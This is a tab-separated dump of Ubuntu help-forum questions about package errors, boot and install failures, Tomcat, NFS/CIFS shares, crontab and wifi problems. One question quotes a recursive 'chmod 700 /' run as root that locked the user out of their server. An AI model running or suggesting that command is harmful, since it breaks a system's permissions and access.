' , '\n ' ) , __file__ , 'exec ' ) ) '' install -- single-version-externally-managed -- record /tmp/pip-0tu3l3-record/install-record.txt -- install-headers /home/david/.virtualenvs/pywork3/include/site/python3.2 failed with error code 1 in /home/david/.virtualenvs/pywork3/build/pygame storing complete log in /home/david/.pip/pip.log thoughts ?
312975	multiple preseeds	i just installed and successfully did a test maas installation using the generic preseed that comes with maas . my organization is looking at maas to scale our ubuntu-based infrastructure , and we were a bit confused . is maas capable or running different preseeds ? for example , we have 4 hardware configurations we have standardized on for different environments . the underlying hardware and the basic configuration varies between each type of hardware and we would like to have a preseed for each environment . is that possible with maas ? thanks .
312979	problem with installing software	i tried to install wine from terminal i this is what i got : liquid @ liquid-desktop : ~ $ sudo apt-get install wine [ sudo ] password for liquid : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.6 but it is not going to be installed e : unable to correct problems , you have held broken packages .
312983	i want to change from 64 bit ubuntu 12.10 to 32 bit	i had installed ubuntu 12.10 amd64 desktop on my laptop , but i realized my laptop 's hardware is not meant for 64 bit ubuntu . ( i also have windows 7 installed in another partion ) is there any way to convert to a 32 bit ubuntu ? edit : i have a single core processor ( i do n't even think its a 64 bit one )
312986	dashed borders of my window manager ( xfce )	i upgraded to the latest xubuntu 13.03 and sometimes borders of my windows ( regardless the application ) become strangely dashed . i managed to make a screenshot : the screenshot is with clearlooks-phenix theme , but the issue is not theme-dependent . i tried multiple themes including the default one for xubuntu and these dashed borders still appear . dashes appear and disappear - they are not permanent . it 's annoying . does anyone know why such dashing appears and how to fix it ? update : adding my compositor settings :
312991	how to completely install wine	i installed wine by doing sudo apt-get install wine and everything went well , but at the end i get the `` package configuration '' and the title says configuring ttf-mscorefonts-installer and they talk about 1.grant of license 2.descripition of other grants and limitations 3.copyright u.s. government restricted rights the problem is that they give all this at the end but there is nothing i can do say `` ok '' or something , thus , wine is not installed . any help please ?
312994	dell inspiron 1501 no wired/wireless w/12.04 or13.04	i do n't know what to do . every install of either 13.04 and 12.04 on my dell does not have a working wired or wireless internet connection . however , if i am running from usb in the trial mode i have working internet through a wired connection using the same ethernet cord . i honestly at this point do not know what i can do to fix this issue as i have gone through every possible fix i have found here and in other places .
312997	cant install ubuntu . how do you format a windows hdd	i have an hp 630 , and would like to install ubuntu . all goes well until the point where you have to choose how you want ubuntu installed . i choose on the whole hdd , i want windows off the hdd . i press enter and about 5 seconds later the cd tray open and the computer reboots . this happens over and over . how do i format this window hdd completely to install ubuntu 13.04 . i have tried 3 different cd 's and the same thing happens each time .
312998	why usage of '* ' does n't always work on zsh ?	i ran the following command on zsh sudo apt-get install rhythmbox* it produced an error , when i ran the same command in bash it worked . why does this happen ? how can i make the above command work on zsh ?
313002	my laptop touchpad stops working during the live demo	i m completely new to all of this ... i just want to install ubuntu because it is suppose to get rid of most of the virus problems , so anyway i was following online instructions to install ubuntu alongside windows 7 these are my laptop specifications . i tried booting with a pendrive using netbootin and other similar program but once i boot the laptop in ubuntu i click try without installing button and go to desktop then my mouse stops working . what am i supposed to do or what am i doing wrong ? ? also please suggest a thread for proper installation of ubuntu alongside windows 7 . thank you .
313007	can not login to server after file permissions change !	i am using ubuntu server . i ran : chmod -r 700 / when i was logged in as root . now when i try to login as my normal user i immediately get kicked out . is there anyway to log back in to the server whether it is root or whoever so that i can change the permissions ? or am i totally screwed ? i dont think i have root access enabled in the /etc/ssh/sshd_config file . i do have physical access to the server . i really need some help here .
313008	amd fx cpu drivers/patch	i am using ubuntu since 2009 on notebooks with intel cpus . however now , that i am using amd 's fx 6300 , i am interested in knowing if there exists anything from ubuntu ( specifically any kernel enhancements/drivers/patches ) for amd 's fx `` family 15h '' piledrivers . reason : i would like to have a kernel which uses the hardware to its full capacity , be able to use the latest instruction sets , for max . performance . i did some tests , started with compiling stable 3.9.7 on my 12.04 lts box , and during compilation i choose processor vendor amd ( unchecked intel/via/etc . ) , and when i started ubuntu with this compiled kernel , in the section `` system settings - > additional drivers '' i found that , in addition to graphic card 's drivers , there were amd family 15h drivers also . however , i would prefer something in this regard tested/signed by ubuntu developers . p.s : 1- the kernel that i have compiled has some issues with nvidia graphics drivers , so i deleted kernel 3.9.7 and installed signed 3.8.xx from ubuntu repositories . 2- incase if somebody is planning to advise me to install `` amd64 '' , i am not talking about amd64 ( which is in fact for 64-bit platform ) .
313011	ca n't install steam games for windows 7 under ubuntu 12.04	i have had windows 7 but have now swapped to linux . i downloaded and installed the steam client with no problem . i can login , but i ca n't download the games i bought before . they are in my library but i cant install them as there is no button . hope someone can help me . btw : i am not a native speaker so i am sorry about mistakes .
313016	nautilus file manager not working	i 'm just installed ubuntu 12.04 and was customizing my main menu using the standard application ubuntu provides for that and eliminated the entry files it contained . unfortunately this resulted not only in eliminating the entry for the main menu but also in uninstalling the default file manager canonical ships with ubuntu . fact is that now the only way to open a directory is to launch nautilus via terminal . if i try to access it from the places menu i 'll be prompted with the following error : as you can see the problem is that for some reason the file manager is not registered any more for handling the directory files . i looked for some file managers on the ubuntu software center and found a couple ones that helped me fix the problem , but none of these is the default one i was using before . how can i restore the one i that was provided with the fresh install of ubuntu ?
313018	grub does n't load with ubuntu on msata , win7 on sata	i 've had win7 installed on my 2.5 '' ssd for a few months . the computer also has a msata slot which i 've now packed with a 16gb ssd . i 've installed ubuntu onto the msata disk from usb which went fine without any errors . now to the odd bit ; when i boot to the msata with ubuntu with the win7 ssd connected , grub does n't load and i 'm stuck at a blank screen ( i 've changed the grub.cfg timeout to five , and set nomodeset and tried forcing vesa which still gives me blank , which is why i think grub 's at fault , not ubuntu ) . but if i unplug the win7 ssd , everything works smooth and fine booting to ubuntu via grub . both ubuntu and win7 are in legacy and my motherboard is set to legacy support . motherboard 's port as msata=port0 and the ssd sata=port1 . any help would be great , thanks .
313023	tools and techniques for diagnosing heating problems	i 've just installed ubuntu 13.04 on a dell m6700 . the laptop becomes too hot to keep on your lap after short usage . what are the best tools i can use to find out what the problem is and solve the issue ?
313027	my computer has originally 1,5 gb of ram but k-x-l-ubuntu , debian ect ... give me less than 463 mb	why is that ? when i was running windows xp on my computer , i had 1,5 gb of ram . i have two questions : why is that ? can i get my 1,5 gb of ram or ubuntu considers that 1,5 gb on windows is 500 mb in linux ? i do not think this is normal because i ca n't do anything except running one app at the time . help please ! i have entered the command : sudo dmidecode -t memory and it gives me a lot of information . i can see this : # dmidecode 2.11 smbios version fixup ( 2.31 - > 2.3 ) . smbios 2.3 present . handle 0x0005 , dmi type 5 , 20 bytes memory controller information error detecting method : none error correcting capabilities : none supported interleave : one-way interleave current interleave : one-way interleave maximum memory module size : 1024 mb maximum total memory size : 2048 mb supported speeds : 60 ns supported memory types : dimm memory module voltage : 3.3 v associated memory slots : 2 0x0006 0x0007 enabled error correcting capabilities : none handle 0x0006 , dmi type 6 , 12 bytes memory module information socket designation : dimm 1 bank connections : 0 1 current speed : 75 ns type : dimm sdram installed size : 256 mb ( double-bank connection ) enabled size : 256 mb ( double-bank connection ) error status : ok handle 0x0007 , dmi type 6 , 12 bytes memory module information socket designation : dimm 2 bank connections : 2 3 current speed : 75 ns type : dimm sdram installed size : 256 mb ( double-bank connection ) enabled size : 256 mb ( double-bank connection ) error status : ok handle 0x0010 , dmi type 16 , 15 bytes physical memory array location : system board or motherboard use : system memory error correction type : none maximum capacity : 3 gb error information handle : not provided number of devices : 2 handle 0x0011 , dmi type 17 , 27 bytes memory device array handle : 0x0010 error information handle : no error total width : 64 bits data width : 64 bits size : 256 mb form factor : dimm set : 1 locator : dimm 0 bank locator : bank 0 , 1 type : sram type detail : synchronous speed : 333 mhz manufacturer : not specified serial number : not specified asset tag : not specified part number : not specified handle 0x0012 , dmi type 17 , 27 bytes memory device array handle : 0x0010 error information handle : no error total width : 64 bits data width : 64 bits size : 256 mb form factor : dimm set : 1 locator : dimm 1 bank locator : bank 2 , 3 type : sram type detail : synchronous speed : 333 mhz manufacturer : not specified serial number : not specified asset tag : not specified part number : not specified now , i am totally confused .
313030	i can not use plugin finder service to download my needed plugins , java and adobe flash player	i have tried downloading them , and i am not 100 % sure how to use the terminal . any help would be great !
313031	software to file handling operations	is there some tool to ubuntu like filerfrog , capable to perform tasks like : delete empty files\folders copy path to clipboard invert selection split and join folders list of files inside a folder rename operations to all files inside specific folder
313032	touch : can not touch `/usr/share/tomcat7/logs/catalina.out ' : no such file or directory	i have a problem starting tomcat from terminal . i installed tomcat using - sudo apt-get install tomcat7 , few days back . now when i 'm starting it using the below command , i 'm getting the following error : ~/tomcat7/bin $ sudo ./startup.sh using catalina_base : /usr/share/tomcat7 using catalina_home : /usr/share/tomcat7 using catalina_tmpdir : /usr/share/tomcat7/temp using jre_home : /usr using classpath : /usr/share/tomcat7/bin/bootstrap.jar : /usr/share/tomcat7/bin/tomcat-juli.jar touch : can not touch `/usr/share/tomcat7/logs/catalina.out ' : no such file or directory ./catalina.sh : 389 : ./catalina.sh : can not create /usr/share/tomcat7/logs/catalina.out : directory nonexistent i ca n't understand what went wrong . i was able to access - http : //localhost:8080 when i installed it . but then , i ran the command to disable the startup at boot time : sudo update-rc.d tomcat remove and now it 's not starting at all . : (
313033	how can i see/stop current running crontab tasks ?	how can i see crontab tasks which are in progress ? how can i stop crontab tasks which are in progress , manually ? is [ this ] question about see the current running cron processes ? yes to kill a process manually one way is to use pkill i had thought about pkill/killall , but some of my commands in crontab file are respectively ! it means that after finishing a command , the next one will be started ! for example : sudo crontab -e 00 10 * * * /usr/bin/wget link ; shutdown -h now so , if i kill wget , the computer will be powered off ! ! ! - > i want to kill a cron task fully , not a part of it ! the next pkill problem : what about scripts ? ( i 've imported some bash scripts to crontab -e ) - > sudo pkill ? ? ?
313041	ubuntu laptop boot without usb or cd	i would like to load ubuntu onto my old laptop but it will only boot from hard drive/ssd , fdd or lan.is there a way to load ubuntu , demo or real , from the ubuntu web site ?
313044	ubuntu freezes at installation-dialog and at live-boot	i´m quite new to ubuntu/linux , because i prefered using windows , yet . now i have a older notebook that runs very slow with windows xp and consumples a lot of battery . so i choosed to use a more efficient operating system - ubuntu . as a fan of the new interface of ubuntu i definitly was about to install 12.04 lts . well.. my notebook is to old for it because its 32bit cpu doesn´t support pae . so i tried to install : 10.04 lts , 11.04 , 12.04 non-pae , 12.04 via network ( mini.iso ) , xubuntu 12.04 always i386-version but always when i want to install , the dialog freezes , means i can´t click anywhere but the mouse is still moveable . when i try to boot from stick and select live-boot it loads ubuntu and after a few seconds it looks like this : https : //skydrive.live.com/redir ? resid=5bb06f365d867d6a ! 405 & authkey= ! amb0d4ndndeaobk hardware information : cpu : pentium m 725 , ram : 512 mb , gpu : ati mobility radeon 9700 ( 64mb ) , hdd : 80gb thanks for your awesome help in advance : )
313045	how do i bundle several units of 3g modems to improve bandwidth ?	how do i bundle let 's say five to ten units of 3g modems in order to improve the download speed ? i 'd like to do this on ubuntu server 12.04.2 lts . in the end , i would like to use the ubuntu server as an internet gateway and connect a macbook pro via wireless lan . it would also be nice if the macbook can do load balancing between wifi and usb modem directly connected . please , also recommend the usb modem models as well as the line binding scripts .
313047	dpkg error whe i try to upgrade nessus on ubuntu server 12.04	when i run this command sudo dpkg -i nessus-5.0.1-ubuntu1110_amd64.deb , i got the following error : dpkg : error processing nessus-5.0.1-ubuntu1110_amd64.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : would anyone have an idea how to fix this ? thank you !
313057	is there anyway to grant the mount command permission to a user ?	is there anyway to grant the mount command permission to a user ? i seems impossible and the user must be a sudoer . however i want to know is it possible to create a group which has admin permission ( only for mount ) and then add the user to this group ?
313058	how to pxe boot a uefi client with nfs rootfs ?	i 'm trying to pxe boot uefi clients . my current setup for bios clients uses pxelinux.0 with a pxelinux.cfg/default like this : default vmlinuz-3.8.0-25-generic append initrd=initrd.img-3.8.0-25-generic root=/dev/nfs nfsroot=10.17.76.1 : /var/lib/tribble/ephemeral ip=dhcp ro nomodeset but i 'm struggling to do the same with uefi , party because there are so many different approaches that can be taken , and there is so little good documentation out there . following this guide to pxe booting the netboot mini.iso on uefi , i was able to pxe boot into the installer , but thus far i have n't figured out how to adapt those instructions to my use case . so there are few things i 'm after : what boot loader is recommended for pxe booting uefi clients ? can you point me to a working example of using said boot loader to pxe boot a uefi client whose rootfs is exported over nfs ? i 've seen many tutorials referencing the pxe and pxecmd grub modules , but those are n't present on ubuntu 13.04 ... are they deprecated , and if so , what replaces them ? options i 'm considering : use syslinux.efi use elilo use grub2 use the linux efi stub loader ( bit of a pain because we 'd have to compile our own kernel with hard-coded boot parameters ) in this sea of options , i 'm hoping to find a low risk solution that will continue to be well supported by ubuntu .
313065	error copying images from camera using nautilus	since i upgraded t 13.04 i can no longer copy images from a flash card located in my canon camera . i can connect to the camera using usb , i can browse and view images , however i am unable to copy any images to my pc . the error message : operation not supported by backend the strange thing is that i can copy folders , just not contents ... any ideas ? ubuntu 13.04 64bit kernel : 3.9.7-030907-generic thanks additional : i do not think the camera is mounting properly . i wonder if it has something to do with gphoto2 ? in order to mount it correctly in an application i have to first unmount the camera from from nautilus . i think the issue lies with the mounting of the camera ... . ? pst007x @ pst007x-serval-professional : ~ $ ls -a /media . .. apt .directory myandroid pst007x pst007x @ pst007x-serval-professional : ~ $ location in nautilus is shown as : gphoto2 : // [ usb:002,012 ] /
313067	when reinstalling ubuntu , should i install the latest version or the version originaly installed on the machine ?	i have inherited a laptop1 from a colleague that originally came with ubuntu 11.10 ( oneric ocelot ) installed . i am planning a clean reinstall of the os to clean her data and set it up as my machine . should i install the latest version of ubuntu ( 12.04 ) or the version that was originally installed ( 11.10 ) ? dell latitude e6230 with intel core i7-3520m cpu 2.9 ghz , 64 bit the driver info says there are no proprietary drivers but the package to workaround e1000e s3 issue is installed
313076	terminfo definitions do n't work ?	i am running ubuntu 12.04 lts on a run-of-the-mill dell desktop computer . i have a wyse wy-60 serial terminal hooked up to the serial port ( ttys0 ) . when the terminal is in vt100 emulation mode , and agetty is set to use vt100 emulation , all features work as they should . this is my /etc/init/ttys0.conf file : respawn exec /sbin/agetty -hl 19200 ttys0 vt100 but when i try to put the terminal in any other emulation ( i.e . wyse 50 , adds a2 , etc . ) , and change the corresponding part of that agetty line , the terminal does n't work correctly ( displays a bunch of escape-sequence garbage on commands like ls ) . in other words , i change the wyse terminal 's emulation in its internal setup utility , then change /etc/init/ttys0.conf to the following : respawn exec /sbin/agetty -hl 19200 ttys0 wyse50 -or- respawn exec /sbin/agetty -hl 19200 ttys0 wy50 i do have terminfo defitions stored for this and a million other models of terminal , in all 3 or 4 places where the terminfo library is stored on ubuntu . so what 's up with this not working ? i want to be able to add some more dumb terminals to my system , such as the wyse wy-30 and wy-50 , which are not capable of vt100 emulation . ca n't get it to work with wyse-50 , adds viewpoint 60 , adds a2 , ibm-pc , or any other terminal emulation besides vt100 .
313078	lubuntu unable to boot/install	so i did something very stupid . i was using xubuntu . i wanted to try lubuntu so i installed the lubuntu desktop flavor . thinking that i had installed the whole thing , i uninstalled xubuntu . through the command prompt . i dont exactly know what i did as you can see i am a noob . now ofcourse it wont start . i just see the lubuntu splash screen and then a bunch of error messages . i have to use live systems like tails and dsl now which are really not my cup of tea . how do i fix it ? i have the lubuntu live cd now . but when i boot through it i end up in the grub recovery mode . what do i do ? these are the error messages after the splash screen : *stopping save kernel messages [ ok ] speech-dispatcher disabled : edit /etc/default/speech-dispatcher *starting vnstat daemon vnstatd *starting the winbind daemon winbind *starting ntp server ntpd aned disabled : edit /etc/default/saned *checking battery state ... acpid : exiting checking for running unattended upgrades : shutting down smartlink modem driver normally . unloading modem driver from kernel ... none found . *i2p router daemon disabled in /etc/default/i2p . speech dispatcher disabled : edit /etc/default/speech-dispatcher . *stopping vnstat daemon vnstatd *asking all remaining processes to terminate ... . *all processes ended within 1 seconds ... . nm-dispatcher.action : caught signal 15 , shutting down ... deconfiguring network interfaces ... deactivating swap ... unmount : /run/lock : not mounted unmount : /run/shm : not mounted * will now halt [ 142.248586 ]
313081	what tool should i use for a bit-by-bit copy of my hard drive ?	i recently wiped my hard disk with a fresh ubuntu installation . i 'm planning to use testdisk to recover the files . however , since i do not have prior experience , i feel it would be safer if i could keep an image of the hard drive as well . that way , i can work on the image to avoid wrecking the original drive even more . i have two questions : 1 ) could you suggest a tool for the same ? 2 ) since i need the image for recovery , i do n't want to overwrite the hard disk anymore than it already has been . hence , could you comment if the tool would affect the hard drive in any way ( if it is run via a usb ) ?
313086	is it possible to setup an interface with both dhcp and a static ip ?	sending a box out to a colo and the guy taking it has no idea of networking . was hoping i could set it up so i can access it no matter which of two switches he plugs it into . after which i can remove one of the entries . something like : auto eth0 iface eth0:0 inet dhcp iface eth0:1 inet static address 66.66.66.220 netmask 255.255.255.224 gateway 66.66.66.254 broadcast 66.66.66.223
313087	what gui are there for axel or for other such downloaders that use multiple connections ?	in order to enjoy my maximum download speed , i use and like axel very much , but from time to time i download multiple files and having so many windows opened has some disadvantages . i use axel with flashgot in firefox ( seamonkey etc ) but i would like to add a gui for that , and possibly have multiple downloads in a nice list as in any civil downloader . i am not aware of a gui for axel that works . axel-kapt crashes . ( a question on how to use it properly in ubuntu got only one somewhat dismissive answer by yours truly ... ) gaxel just opens a window with empty fields that i have to manually fill ( which beats the purpose ) . i would like to know how to install something like gwget which is described here , in an old answer as an alternative ( but gwget itself might be too old too ) . ( so , what i ask is : multiple-connection/maximizing-speed downloader , with a gui . ) help !
313089	how can i share a directory with an another user ?	i do n't want the shared folder to be accessible by anyone on the system , i want it to be accessible just to a restricted set of users . how to i do that ?
313091	is there a digital literacy	i am in africa , and i wish to know if there 's any project that introduces new users to ubuntu ? something like this project of ms on digital literacy .
313093	how do i mount a cifs share via fstab and give full rw to guest	i want to create a public folder that has full rw access . the problem with my configuration is that windows users have no issues as guests ( they can rw and delete ) , my ubuntu client ca n't do the same . we can only write and read , but not create or delete . here is the my smb.conf from my server : [ global ] workgroup = workgroup netbios name = fileserver server string = turnkey fileserver os level = 20 security = user map to guest = bad password passdb backend = tdbsam null passwords = yes admin users = root encrypt passwords = true obey pam restrictions = yes pam password change = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . add user script = /usr/sbin/useradd -m ' % u ' -g users -g users delete user script = /usr/sbin/userdel -r ' % u' add group script = /usr/sbin/groupadd ' % g' delete group script = /usr/sbin/groupdel ' % g' add user to group script = /usr/sbin/usermod -g ' % g ' ' % u' guest account = nobody syslog = 0 log file = /var/log/samba/samba.log max log size = 1000 wins support = yes dns proxy = no socket options = tcp_nodelay panic action = /usr/share/samba/panic-action % d [ homes ] comment = home directory browseable = no read only = no valid users = % s [ storage ] create mask = 0777 directory mask = 0777 browseable = yes comment = public share writeable = yes public = yes path = /srv/storage the following fstab entry does n't yield full r/w access to the share . //192.168.0.5/storage /media/myname/tk-public/ cifs rw 0 0 this does n't work either //192.168.0.5/storage /media/myname/tk-public/ cifs rw , guest , iocharset=utf8 , file_mode=0777 , dir_mode=0777 , noperm 0 0 using the following location in nemo/nautilus w/o the share being mounted does work : smb : //192.168.0.5/storage/ extra info . i just noticed that if i copy a file to the share after mounting , my ubuntu client immediately make `` nobody '' be the owner , and the group `` no group '' has read and write , with everyone else as read-only . what am i doing wrong ?
313095	schedule to turn off monitor via crontab ?	i want to turn off monitor on a specific period of time automatically ( for example between 07:00 and 11:00 ) . is there any command to be set in crontab file ? is there any better way ? in summary : turning off the monitor at 07:00 automatically . turning on the monitor at 11:00 automatically . scren-saver & lock screen are disabled !
313098	creating two nfs shares : one read/write and one read only	hopefully this is an easy question ! background : i am currently using ubuntu 12.04 as a home media server running mythtv and using xbmc as frontends on both windows and ubuntu . my media is shared via smb and nfs , but i use nfs primarily for the xbmc frontends because the lower overhead translates into significantly better performance . what i want : what i would like to do is to create two nfs shares to my media files . one share i would like to be read/write , and the other share i would like to be read only . this way , i can set up a frontend for my roommate , for example , where he can access the files for viewing , but not screw anything up . since i ca n't create two identical nfs shares , one read/write and one read-only , i tried to create two mounts to differentiate them . in /etc/fstab , i have the following device mounted : /dev/stb1 /mnt/media ext4 defaults 0 0 and in /etc/exports , i have the following nfs share : /mnt/media * ( rw , async , all_squash , insecure , anonuid=1001 , anongid=122 , no_subtree_check ) the above works fine for read/write access . my intention was to create a second , read-only mount , and then export it via nfs as /mnt/media_readonly . so i 've tried to create the second mount as follows : /dev/stb1 /mnt/media_readonly ext4 ro , auto , user , noexec 0 0 but i get an error : mount : according to mtab , /dev/sdb1 is mounted on /mnt/media so i guess i ca n't mount the same device twice ? how can i export the same path via nfs in a read-only format ?
313103	can not start tomcat after installing a private instance	ok , now i 've spend enough time configuring tomcat properly on my ubuntu 12.04 os , and i 'm already fed-up , given that it 's already 2:00 am . first i installed tomcat7 as described in this question - how should i install apache tomcat 7 for use with eclipse ? . then i thought i would install a private instance of tomcat as described in an answer to the linked question . so , i uninstalled tomcat7 using the process described in this question - tomcat still running after uninstalling and now , i installed a private instance using : sudo apt-get install tomcat7-user sudo tomcat7-instance-create ~/my-tomcat-instance now , when i go to start the tomcat , it 's not starting . since it is not installed as a service , so i of course can not start it as a service . but , i ca n't even start it using the startup.sh file . i 'm getting the following error : /usr/share/tomcat7 $ bin/startup.sh using catalina_base : /usr/share/tomcat7 using catalina_home : /usr/share/tomcat7 using catalina_tmpdir : /usr/share/tomcat7/temp using jre_home : /usr using classpath : /usr/share/tomcat7/bin/bootstrap.jar : /usr/share/tomcat7/bin/tomcat-juli.jar touch : can not touch `/usr/share/tomcat7/logs/catalina.out ' : no such file or directory bin/catalina.sh : 389 : bin/catalina.sh : can not create /usr/share/tomcat7/logs/catalina.out : directory nonexistent now what 's the problem here . i understand that earlier tomcat was not starting as it was installed as a service . so , i 've to use - service tomcat7 start , to start it . but now , it 's not installed as a service . so , how am i supposed to start it ? i 'm facing another issue of configuring the newly installed tomcat in eclipse . it 's showing me the same error as in this question - tomcat 7 and eclipse integration getting error when i add the server . i 'm using eclipse juno . installed it by downloading a .tar.gz file . kindly help me out of here . i 've been stuck with it for the last 5 hours .
313105	where does ubuntu software center store its ( language ) settings ?	on a fresh install ( 13.04 ) i see a strange mix of languages in software center the menu ( like my system language ) is in english , but the descriptions are in german . i want the descriptions in english too . i am using a german keyboard and have german installed too ( for giving support to students with german as system language : - ) ) in system settings i have moved german below english - so it should be ignored , i have logged out after that . i have cleared the `` software center cache '' with ubuntu tweak . the picture remains the same .
313107	what is `` web seed '' ?	i 'm downloading a file by transmission . it shows a connection to a web seed . see the below screenshot : what is that `` web seed '' , shown in the picture ? ( which kind of seeders ? ) is it safe ?
313108	cloning disks with lubuntu 12.04 lead to lvds interface error	i want to ask about a problem i´m having when i want to clone an image of linux lubuntu 12.04 from one pc to another . both systems are identical , hardware , memory and cf cards . the source system runs fine , and i´ve get the image with dd and selfimage . when i download this image to the cloned system it boots ok , but when it should start the graphical interface , it freezes and send various messages on screen . i´m aware about the problem with eth0 and the 70-persistent-net file . mi question is : could it be a similar issue about graphical interface ? is there a file with hardware-related data that i could edit-delete , to match the new hardware ? thanks you
313110	ubuntu brightness automatically without any delay	after change brightness to for example 30 % without delay and between work on laptop , that automatically change to 60 % after 10~15 second . i 'm change grub_cmdline_linux= '' acpi_backlight=vendor '' and update grub but that does not any change and i have this problem now .
313113	computer boot/installation failure	i recently tried to insatll kubuntu and it failed . it completely removed everything off of my hdd and there is no operating system . everytime i try to install a distro it fails during instillation . i got ubuntu 13.04 to work but it required a reboot and after that it did not work . i tried to re-install ubuntu but it failed . i have tried ubuntu , kubuntu , and xubuntu and they all failed . with kubuntu and xubuntu i get an error saying , `` the 'grub-efi-amd64-signed ' package failed to install into /target/ . without the grub boot loader , the installed system will not boot '' . when i select try ( distro ) it loads up but the installation wo n't finish . i do not want to have to try the distro everytime i want to get on it . any help ?
313117	software center freezing on start up	i already did the apt-get purge , install and update thing but it still freezes when trying to start . this is what i get trying to start in terminal : cliff @ cliff-aspire-x1301 : ~ $ software-center 2013-06-26 17:00:29,092 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-06-26 17:00:29,097 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-06-26 17:00:29,501 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-06-26 17:00:29,653 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . killed
313118	changing username	i tried to change my username using command : sudo usermod -l newusername oldusername so when i entered it in terminal it showed me : user 'myusername ' is currently used by the process 2553 what does it mean ?
313121	why the ubuntu app developer website is not showing content about development for desktop ?	looks like they removed every content that is not related with development for desktop . for example when you click in `` get started '' tab there is only information about the ubuntu touch and its sdk , when you click on `` resources '' tab and then on `` programming languages '' you only see c++ , javascript and qml ( no python , java , mono , etc ) . you also ca n't find any information about quickly , try clicking on `` quicky '' at `` resources '' in the website bottom and you will see a `` page not found '' error . is the site under maintenance or something else ?
313124	i ca n't connect intel corporation centrino wireless-n 2230 ( rev c4 ) touch smart hp envy i7	i ca n't connect intel corporation centrino wireless-n 2230 ( rev c4 ) in a touch smart hp envy i7core when i put this rfkill list in the terminal say hp-wifi : wireless lan soft blocked : no hard blocked : yes do you konw what is wrong ? how i can activate the wirless
313126	reinstall unity on 13.04 from cinnamon	i am trying out cinnamon 1.8 as my only desktop environment instead of unity . i am liking so far with customizing my desktop and adding extras . how do you get unity back with the terminal ? i used this source for removing unity . how to completely remove unity , and replace it with cinnamon ?
313132	how do i execute sh file in ubuntu 13.04 ?	i am trying to make a .sh file executable . after editing the permissions of the file to allow executing , i open the file and it to run it and it just opens the text editor . i would like to not have to run it from the terminal every time i want to use it .
313133	13.04 i5 temperature	i 'd have a fresh install of ubuntu with tlp configured and using acpi_call to keep 7670m turned off . i was a short time arch user and with openbox and firefox it was about 60 to 70 degrees ; wanted to turn to a stable release just for this reason . acpitz-virtual-0 adapter : virtual device temp1 : +50.0°c radeon-pci-0100 adapter : pci adapter temp1 : -128.0°c coretemp-isa-0000 adapter : isa adapter physical id 0 : +56.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +54.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +55.0°c ( high = +87.0°c , crit = +105.0°c ) the temperature is not seriously high yet can be lower . any suggestions ? edit : surfing temps with one tab firefox : acpitz-virtual-0 adapter : virtual device temp1 : +58.0°c coretemp-isa-0000 adapter : isa adapter physical id 0 : +57.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +55.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +58.0°c ( high = +87.0°c , crit = +105.0°c ) edit 2 : using a simple linux game get highten it to 70 .
313135	i ca n't start airodump-ng ( aircrack-ng )	this is what i get when starting airodump-ng root @ guido-laptop : /home/guido # airodump-ng wlan0 ioctl ( siocsiwmode ) failed : device or resource busy arp linktype is set to 1 ( ethernet ) - expected arphrd_ieee80211 , arphrd_ieee80211_full or arphrd_ieee80211_prism instead . make sure rfmon is enabled : run 'airmon-ng start wlan0 < # > ' sysfs injection support was not found either .
313138	i want to know when a running process will terminate . how can i watch it ?	i would like to know any command that i can run to know the end time of a process . i have already launched the process and know its pid but i want to know if there is any command that can tell me at what time it ended . thanks for your help .
313143	12.04 on pentium dual core with 1gb or ram running slow	hey i have a lenovo thinkpad laptop with ubuntu 12.04 installed . it runs slow . i tried `` system profiler and benchmark '' to test the computer . but the application quits and closes after the first few benchmark test . before it even gets to the other tests . so i tried `` hardinfo '' that installed on the puppy linux live cd . that did the same thing ( the apps look just a like ) . the memory usage isnt the problem on this pc . its the cpu processes . just running the `` system profiler '' app that comes with ubuntu uses about 34 % on each core , default with nothing running its 5-10 % on each core . i cant really find what the deal is other than that ubuntu is a cpu hog . so im testing unity2d at the moment to see how it goes . if you have any other suggestions , feel free to answer this question . thanks
313147	hp envy dv6t-7300 : disabled wifi through button and ca n't enable it anymore	well , i have a hp envy dv6t-7300 laptop that came with a ralink rt5390 wifi card . everything was working perfectly , and eventually i press the wifi button in my keyboard to toggle the card on/off . until today , all worked right : if the wifi was off ( wifi led amber ) and i press the wifi button , after a few seconds the led turn white and everything works . if i repeat the process , the wifi led turn amber and the card get disabled , but now , i ca n't turn it on anymore . running sudo rfkill list all i get : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : yes so , i ran sudo rfkill unblock all but nothing changed . as a side note , if i run sudo ifconfig wlan0 up , the indicator led gets white ( indicating that the card was enabled ) , but ubuntu still say that the card is blocked by hardware . extra information : the card works without issues in windows and in ubuntu installer ( booting from a live cd ) . i 'm using the card out-of-box , using the drivers already included in ubuntu 12.10 . the module rt2800pci is loaded and working fine , not blacklisted , etc , etc . the card and the button toggle worked flawlessly until today , when i toggled it off and ca n't turn it on anymore ... the problem is back , but in a different manner : if i do n't press the wifi key a few times during the grub loading , in the login screen the wifi button will be ambar ( disabled ) , pressing it will toggle it white ( enabled ) or ambar ( disabled ) again , but ubuntu still says that the network card was disabled by hardware and does n't connect ... in other words , if i do n't press the wifi button a few times when ubuntu is booting , it will be stuck with the `` network card was disabled by hardware '' message , even if the light is white ( enabled ) . any clue ? maybe a error in some startup script or config file ?
